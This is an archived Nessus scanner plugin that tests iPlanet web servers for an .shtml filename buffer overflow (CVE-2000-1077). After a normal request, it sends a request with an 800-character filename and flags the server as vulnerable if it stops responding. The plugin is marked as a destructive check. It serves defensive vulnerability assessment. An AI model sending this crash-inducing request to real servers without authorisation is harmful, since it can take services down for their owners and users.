home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / iws_shtml.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  97 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10538);
  10.  script_bugtraq_id(1848);
  11.  script_version ("$Revision: 1.14 $");
  12.  script_cve_id("CVE-2000-1077");
  13.  
  14.  name["english"] = "iWS shtml overflow";
  15.  name["francais"] = "Overflow shtml dans iWS";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. It is possible to make the remote iPlanet web server execute
  20. arbitrary code when requesting a too long .shtml file (with a name 
  21. longer than 800 chars and containing computer code).
  22.  
  23. An attacker may use this flaw to gain a shell on this host
  24.  
  25. Solution : Disable server side parsing of HTML page (Content Management -> Parse HTML)
  26. Risk factor : High";
  27.  
  28.  desc["francais"] = "
  29. Il est possible de faire executer du code arbitraire au serveur
  30. iPlanet distant en demandant un fichier trop long dont le nom
  31. fini par .shtml (avec un nom > 800 caractΦres et contenant du
  32. code machine).
  33.  
  34. Un pirate peut utiliser ce problΦme pour obtenir un shell sur
  35. cette machine.
  36.  
  37. Solution : dΘsactivez l'option de parse HTML (Content Management -> Parse HTML)
  38. Facteur de risque : ElevΘ";
  39.  
  40.  
  41.  script_description(english:desc["english"], francais:desc["francais"]);
  42.  
  43.  summary["english"] = "Web server buffer overflow";
  44.  summary["francais"] = "DΘpassement de buffer dans un serveur web";
  45.  script_summary(english:summary["english"], francais:summary["francais"]);
  46.  
  47.  script_category(ACT_DESTRUCTIVE_ATTACK);
  48.  
  49.  
  50.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  51.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  52.  family["english"] = "Gain a shell remotely";
  53.  family["francais"] = "Obtenir un shell α distance";
  54.  script_family(english:family["english"], francais:family["francais"]);
  55.  script_dependencie("find_service.nes", "httpver.nasl", "http_version.nasl");
  56.  script_require_ports("Services/www",80);
  57.  script_require_keys("www/iplanet");
  58.  exit(0);
  59. }
  60.  
  61.  
  62. include("http_func.inc");
  63.  
  64. port = get_http_port(default:80);
  65.  
  66. if(!get_port_state(port))exit(0);
  67.  
  68. soc = http_open_socket(port);
  69. if(soc)
  70. {
  71.   banner = get_http_banner(port:port);
  72.   if(egrep(pattern:"^Server:.*Netscape-Enterprise", string:banner))
  73.   {
  74.   soc = http_open_socket(port);
  75.   req1 = http_get(item:"/XXX.shtml", port:port);
  76.   send(socket:soc, data:req1);
  77.   r = http_recv(socket:soc);
  78.   http_close_socket(soc);
  79.   if(r)
  80.   {
  81.    soc = http_open_socket(port);
  82.    if(soc)
  83.    {
  84.    req2 = http_get(item:string("/", crap(800), ".shtml"), port:port);
  85.    send(socket:soc, data:req2);
  86.    r = http_recv(socket:soc);
  87.    http_close_socket(soc);
  88.    if(!r)security_hole(port);
  89.    }
  90.   }
  91.  }
  92. }
  93.  
  94.  
  95.  
  96.  
  97.